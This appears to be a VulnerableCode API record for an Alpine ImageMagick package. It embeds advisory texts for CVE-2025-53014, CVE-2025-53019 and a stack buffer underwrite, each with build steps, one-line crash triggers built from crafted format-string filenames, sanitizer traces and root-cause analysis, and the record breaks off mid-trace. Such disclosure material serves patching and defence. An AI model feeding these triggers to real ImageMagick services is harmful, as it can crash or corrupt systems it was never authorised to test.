Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/418443?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/418443?format=api", "purl": "pkg:apk/alpine/imagemagick@7.1.2.8-r0?arch=aarch64&distroversion=v3.23&reponame=community", "type": "apk", "namespace": "alpine", "name": "imagemagick", "version": "7.1.2.8-r0", "qualifiers": { "arch": "aarch64", "distroversion": "v3.23", "reponame": "community" }, "subpath": "", "is_vulnerable": false, "next_non_vulnerable_version": "7.1.2.12-r0", "latest_non_vulnerable_version": "7.1.2.19-r0", "affected_by_vulnerabilities": [], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/28920?format=api", "vulnerability_id": "VCID-5s8n-dfjf-ruey", "summary": "ImageMagick has a Heap Buffer Overflow in InterpretImageFilename\n# Heap Buffer Overflow in InterpretImageFilename\n\n## Summary\nA heap buffer overflow was identified in the `InterpretImageFilename` function of ImageMagick. The issue stems from an off-by-one error that causes out-of-bounds memory access when processing format strings containing consecutive percent signs (`%%`).\n\n## Environment\n- **OS**: Arch Linux (Linux gmkhost 6.14.2-arch1-1 # 1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 18:43:59 +0000 x86_64 GNU/Linux (GNU libc) 2.41)\n- **Architecture**: x86_64\n- **Compiler**: gcc (GCC) 15.1.1 20250425\n\n## Reproduction\n\n### Build Instructions\n```bash\n# Clone the repository\ngit clone https://github.com/ImageMagick/ImageMagick.git\ncd ImageMagick\ngit reset --hard 8fff9b4f44d2e8b5cae2bd6db70930a144d15f12\n\n# Build with AddressSanitizer\nexport CFLAGS=\"-fsanitize=address -g -O1\"\nexport CXXFLAGS=\"-fsanitize=address -g -O1\"\nexport LDFLAGS=\"-fsanitizer=address\"\n./configure\nmake\n\n# Set library path and trigger the crash\nexport LD_LIBRARY_PATH=\"$(pwd)/MagickWand/.libs:$(pwd)/MagickCore/.libs:$LD_LIBRARY_PATH\"\n./utilities/.libs/magick %% a\n```\n\n### Minimum Trigger\n```bash\n./utilities/.libs/magick %% [any_output_filename]\n```\n\n## Crash Analysis\n\n### AddressSanitizer Output\n```\n$ ./utilities/.libs/magick %% a\n=================================================================\n==2227694==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7037f99e3ad3 at pc 0x741801e81a17 bp 0x7ffd22fa4e00 sp 0x7ffd22fa45b8\nREAD of size 1 at 0x7037f99e3ad3 thread T0\n #0 0x741801e81a16 in strchr /usr/src/debug/gcc/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:746\n #1 0x7418013b4f06 in InterpretImageFilename MagickCore/image.c:1674\n #2 0x7418012826a3 in ReadImages MagickCore/constitute.c:1040\n #3 0x741800e4696b in CLINoImageOperator MagickWand/operation.c:4959\n #4 0x741800e64de7 in CLIOption MagickWand/operation.c:5473\n #5 0x741800d92edf in ProcessCommandOptions MagickWand/magick-cli.c:653\n #6 0x741800d94816 in MagickImageCommand MagickWand/magick-cli.c:1392\n #7 0x741800d913e4 in MagickCommandGenesis MagickWand/magick-cli.c:177\n #8 0x5ef7a3546638 in MagickMain utilities/magick.c:162\n #9 0x5ef7a3546872 in main utilities/magick.c:193\n #10 0x7417ff53f6b4 (/usr/lib/libc.so.6+0x276b4) (BuildId: 468e3585c794491a48ea75fceb9e4d6b1464fc35)\n #11 0x7417ff53f768 in __libc_start_main (/usr/lib/libc.so.6+0x27768) (BuildId: 468e3585c794491a48ea75fceb9e4d6b1464fc35)\n #12 0x5ef7a3546204 in _start (/home/kforfk/workspace/fuzz_analysis/saigen/ImageMagick/utilities/.libs/magick+0x2204) (BuildId: 96677b60628cf297eaedb3eb17b87000d29403f2)\n\n0x7037f99e3ad3 is located 0 bytes after 3-byte region [0x7037f99e3ad0,0x7037f99e3ad3)\nallocated by thread T0 here:\n #0 0x741801f20e15 in malloc /usr/src/debug/gcc/gcc/libsanitizer/asan/asan_malloc_linux.cpp:67\n #1 0x7418013e86bc in AcquireMagickMemory MagickCore/memory.c:559\n\nSUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/image.c:1674 in InterpretImageFilename\nShadow bytes around the buggy address:\n 0x7037f99e3800: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa\n 0x7037f99e3880: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa\n 0x7037f99e3900: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa\n 0x7037f99e3980: fa fa 07 fa fa fa 00 fa fa fa fd fa fa fa fd fa\n 0x7037f99e3a00: fa fa 07 fa fa fa fd fa fa fa fd fa fa fa 00 04\n=>0x7037f99e3a80: fa fa 00 04 fa fa 00 00 fa fa[03]fa fa fa 03 fa\n 0x7037f99e3b00: fa fa 00 01 fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7037f99e3b80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7037f99e3c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7037f99e3c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7037f99e3d00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n==2227694==ABORTING\n```\n\n## Root Cause Analysis\nThe first command line argument is interpreted as `MagickImageCommand`:\nhttps://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/utilities/magick.c#L83\n```c\nconst CommandInfo\n MagickCommands[] =\n {\n MagickCommandSize(\"magick\", MagickFalse, MagickImageCommand),\n```\n\nIt is invoked here:\nhttps://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L220\n```c\nstatus=command(image_info,argc,argv,&text,exception);\n```\n\nThe execution then follows this path:\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L1387\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L586\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/magick-cli.c#L419\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/operation.c#L5391\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/operation.c#L5473\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickWand/operation.c#L4959\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/constitute.c#L1009\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/constitute.c#L1039\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/image.c#L1649\n- https://github.com/ImageMagick/ImageMagick/blob/8fff9b4f44d2e8b5cae2bd6db70930a144d15f12/MagickCore/image.c#L1674\n\nThe execution eventually reaches `InterpretImageFilename` and enters a loop. The `format` variable here is `\"%%\"`. At this point, it is safe to access `*(format + 2)` but not safe to access `*(format + 3)`.\n\n```c\nfor (p=strchr(format,'%'); p != (char *) NULL; p=strchr(p+1,'%'))\n{\n q=(char *) p+1;\n if (*q == '%')\n {\n p=q+1;\n continue;\n }\n```\n\nThe first `strchr` call returns a pointer equal to `format` and assigns it to `p`. Then `q` is initialized with `p + 1` (`format + 1`), and `*q` is `'%'`, so the code enters the if branch. Here, `p` is reassigned to `q + 1` (`format + 2`).\n\nIn the next iteration, `p + 1` (`format + 3`) is passed to `strchr`, and when `strchr` accesses it, this causes an out-of-bounds read.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53014.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53014.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53014", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.15844", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.15795", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.1571", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.1591", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.1774", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17786", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17768", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17685", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17647", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17639", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17693", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53014" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53014", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53014" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick6/commit/79b6ed03770781d996d1710b89fbb887e5ea758a", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/79b6ed03770781d996d1710b89fbb887e5ea758a" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/29d82726c7ec20c07c49ba263bdcea16c2618e03", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/29d82726c7ec20c07c49ba263bdcea16c2618e03" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hm4x-r5hc-794f", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-14T18:26:03Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hm4x-r5hc-794f" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53014", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53014" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339", "reference_id": "1109339", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379941", "reference_id": "2379941", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379941" }, { "reference_url": "https://github.com/advisories/GHSA-hm4x-r5hc-794f", "reference_id": "GHSA-hm4x-r5hc-794f", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hm4x-r5hc-794f" }, { "reference_url": "https://usn.ubuntu.com/7728-1/", "reference_id": "USN-7728-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7728-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/418443?format=api", "purl": "pkg:apk/alpine/imagemagick@7.1.2.8-r0?arch=aarch64&distroversion=v3.23&reponame=community", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/imagemagick@7.1.2.8-r0%3Farch=aarch64&distroversion=v3.23&reponame=community" } ], "aliases": [ "CVE-2025-53014", "GHSA-hm4x-r5hc-794f" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5s8n-dfjf-ruey" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/29097?format=api", "vulnerability_id": "VCID-784p-34mz-vucz", "summary": "ImageMagick has a Memory Leak in magick stream\n## Summary\n\nIn ImageMagick's `magick stream` command, specifying multiple consecutive `%d` format specifiers in a filename template causes a memory leak.\n\n## Details\n\n- **Vulnerability Type:** Memory leak\n- **Affected Version:** ImageMagick 7.1.1-47 (as of commit 82572afc, June 2025)\n\n## Reproduction\n\n### Tested Environment\n\n- **Operating System:** Ubuntu 22.04 LTS\n- **Architecture:** x86_64\n- **Compiler:** gcc with AddressSanitizer (gcc version: 11.4.0)\n\n### Reproduction Steps\n\n```bash\n# Clone source\ngit clone --depth 1 --branch 7.1.1-47 https://github.com/ImageMagick/ImageMagick.git ImageMagick-7.1.1\ncd ImageMagick-7.1.1\n\n# Build with ASan\nCFLAGS=\"-g -O0 -fsanitize=address -fno-omit-frame-pointer\" CXXFLAGS=\"$CFLAGS\" LDFLAGS=\"-fsanitize=address\" ./configure --enable-maintainer-mode --enable-shared && make -j$(nproc) && make install\n\n# Trigger crash\n./utilities/magick stream %d%d a a\n```\n\n### Output\n```\n$ magick stream %d%d a a\nstream: no decode delegate for this image format `' @ error/constitute.c/ReadImage/746.\nstream: missing an image filename `a' @ error/stream.c/StreamImageCommand/755.\n\n=================================================================\n==114==ERROR: LeakSanitizer: detected memory leaks\n\nDirect leak of 152 byte(s) in 1 object(s) allocated from:\n #0 0x7fc4ebe58887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145\n #1 0x7fc4eb563c5c in AcquireMagickMemory MagickCore/memory.c:559\n #2 0x7fc4eb563c82 in AcquireCriticalMemory MagickCore/memory.c:635\n #3 0x7fc4eb60c2be in AcquireQuantumInfo MagickCore/quantum.c:119\n #4 0x7fc4eb6b6621 in StreamImage MagickCore/stream.c:1335\n #5 0x7fc4eb09d889 in StreamImageCommand MagickWand/stream.c:292\n #6 0x7fc4eaf1295d in MagickCommandGenesis MagickWand/magick-cli.c:177\n #7 0x55a34f7c0a0c in MagickMain utilities/magick.c:153\n #8 0x55a34f7c0cba in main utilities/magick.c:184\n #9 0x7fc4ea38fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n\nIndirect leak of 64 byte(s) in 1 object(s) allocated from:\n #0 0x7fc4ebe5957c in __interceptor_posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:226\n #1 0x7fc4eb680e2f in AcquireSemaphoreMemory MagickCore/semaphore.c:154\n #2 0x7fc4eb680f30 in AcquireSemaphoreInfo MagickCore/semaphore.c:200\n #3 0x7fc4eb60d38d in GetQuantumInfo MagickCore/quantum.c:435\n #4 0x7fc4eb60c30e in AcquireQuantumInfo MagickCore/quantum.c:121\n #5 0x7fc4eb6b6621 in StreamImage MagickCore/stream.c:1335\n #6 0x7fc4eb09d889 in StreamImageCommand MagickWand/stream.c:292\n #7 0x7fc4eaf1295d in MagickCommandGenesis MagickWand/magick-cli.c:177\n #8 0x55a34f7c0a0c in MagickMain utilities/magick.c:153\n #9 0x55a34f7c0cba in main utilities/magick.c:184\n #10 0x7fc4ea38fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n\nSUMMARY: AddressSanitizer: 216 byte(s) leaked in 2 allocation(s).\n```\n\n### Commits\nFixed in https://github.com/ImageMagick/ImageMagick/commit/fc3ab0812edef903bbb2473c0ee652ddfd04fe5c and https://github.com/ImageMagick/ImageMagick6/commit/d49460522669232159c2269fa64f73ed30555c1b", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53019.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53019.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53019", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24926", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24806", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24739", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24966", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26541", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26587", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.2658", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26424", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26463", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.2649", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26484", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53019" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53019", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53019" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick6/commit/d49460522669232159c2269fa64f73ed30555c1b", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/d49460522669232159c2269fa64f73ed30555c1b" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/fc3ab0812edef903bbb2473c0ee652ddfd04fe5c", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/fc3ab0812edef903bbb2473c0ee652ddfd04fe5c" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cfh4-9f7v-fhrc", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:27:49Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cfh4-9f7v-fhrc" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53019", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53019" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339", "reference_id": "1109339", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379949", "reference_id": "2379949", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379949" }, { "reference_url": "https://github.com/advisories/GHSA-cfh4-9f7v-fhrc", "reference_id": "GHSA-cfh4-9f7v-fhrc", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cfh4-9f7v-fhrc" }, { "reference_url": "https://usn.ubuntu.com/7728-1/", "reference_id": "USN-7728-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7728-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/418443?format=api", "purl": "pkg:apk/alpine/imagemagick@7.1.2.8-r0?arch=aarch64&distroversion=v3.23&reponame=community", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/imagemagick@7.1.2.8-r0%3Farch=aarch64&distroversion=v3.23&reponame=community" } ], "aliases": [ "CVE-2025-53019", "GHSA-cfh4-9f7v-fhrc" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-784p-34mz-vucz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/28405?format=api", "vulnerability_id": "VCID-9ewm-6688-kkar", "summary": "ImageMagick has a Stack Buffer Overflow in image.c\nHi, we have found a stack buffer overflow and would like to report this issue.\nCould you confirm if this qualifies as a security vulnerability? I am happy to provide any additional information needed.\n\n## Summary\n\nIn ImageMagick's `magick mogrify` command, specifying multiple consecutive `%d` format specifiers in a filename template causes internal pointer arithmetic to generate an address below the beginning of the stack buffer, resulting in a stack overflow through `vsnprintf()`.\n\n### Additional information\n\n Upon further investigation, we found that the same issue occurs not only with mogrify but also with the following subcommands: compare, composite, conjure, convert, identify, mogrify, and montage.\n\nFurthermore, we confirmed that this vulnerability has the potential to lead to RCE. RCE is possible when ASLR is disabled and there is a suitable one_gadget in libc, provided that options and filenames can be controlled.\n\n## Details\n\n- **Vulnerability Type:** CWE-124: Buffer Underwrite\n- **Affected Component:** MagickCore/image.c - Format processing within InterpretImageFilename()\n- **Affected Version:** ImageMagick 7.1.1-47 (as of commit 82572afc, June 2025)\n- **CWE-124: Buffer Underwrite:** A vulnerability where writing occurs to memory addresses before the beginning of a buffer. This is caused by a design flaw in fixed offset correction, resulting in negative pointer arithmetic during consecutive format specifier processing.\n\n## Reproduction\n\n### Tested Environment\n\n- **Operating System:** Ubuntu 22.04 LTS\n- **Architecture:** x86_64\n- **Compiler:** gcc with AddressSanitizer (gcc version: 11.4.0)\n\n### Reproduction Steps\n\n```bash\n# Clone source\ngit clone --depth 1 --branch 7.1.1-47 https://github.com/ImageMagick/ImageMagick.git ImageMagick-7.1.1\ncd ImageMagick-7.1.1\n\n# Build with ASan\nCFLAGS=\"-g -O0 -fsanitize=address -fno-omit-frame-pointer\" CXXFLAGS=\"$CFLAGS\" LDFLAGS=\"-fsanitize=address\" ./configure --enable-maintainer-mode --enable-shared && make -j$(nproc) && make install\n\n# Trigger crash\n./utilities/magick mogrify %d%d\n```\n\n### Output\n\n```plaintext\n==4155==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffda834caae at pc 0x7f1ea367fb27 bp 0x7ffda834b680 sp 0x7ffda834ae10\nWRITE of size 2 at 0x7ffda834caae thread T0\n #0 0x7f1ea367fb26 in __interceptor_vsnprintf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1668\n #1 0x7f1ea2dc9e3e in FormatLocaleStringList MagickCore/locale.c:470\n #2 0x7f1ea2dc9fd9 in FormatLocaleString MagickCore/locale.c:495\n #3 0x7f1ea2da0ad5 in InterpretImageFilename MagickCore/image.c:1696\n #4 0x7f1ea2c6126b in ReadImages MagickCore/constitute.c:1051\n #5 0x7f1ea27ef29b in MogrifyImageCommand MagickWand/mogrify.c:3858\n #6 0x7f1ea278e95d in MagickCommandGenesis MagickWand/magick-cli.c:177\n #7 0x560813499a0c in MagickMain utilities/magick.c:153\n #8 0x560813499cba in main utilities/magick.c:184\n #9 0x7f1ea1c0bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #10 0x7f1ea1c0be3f in __libc_start_main_impl ../csu/libc-start.c:392\n #11 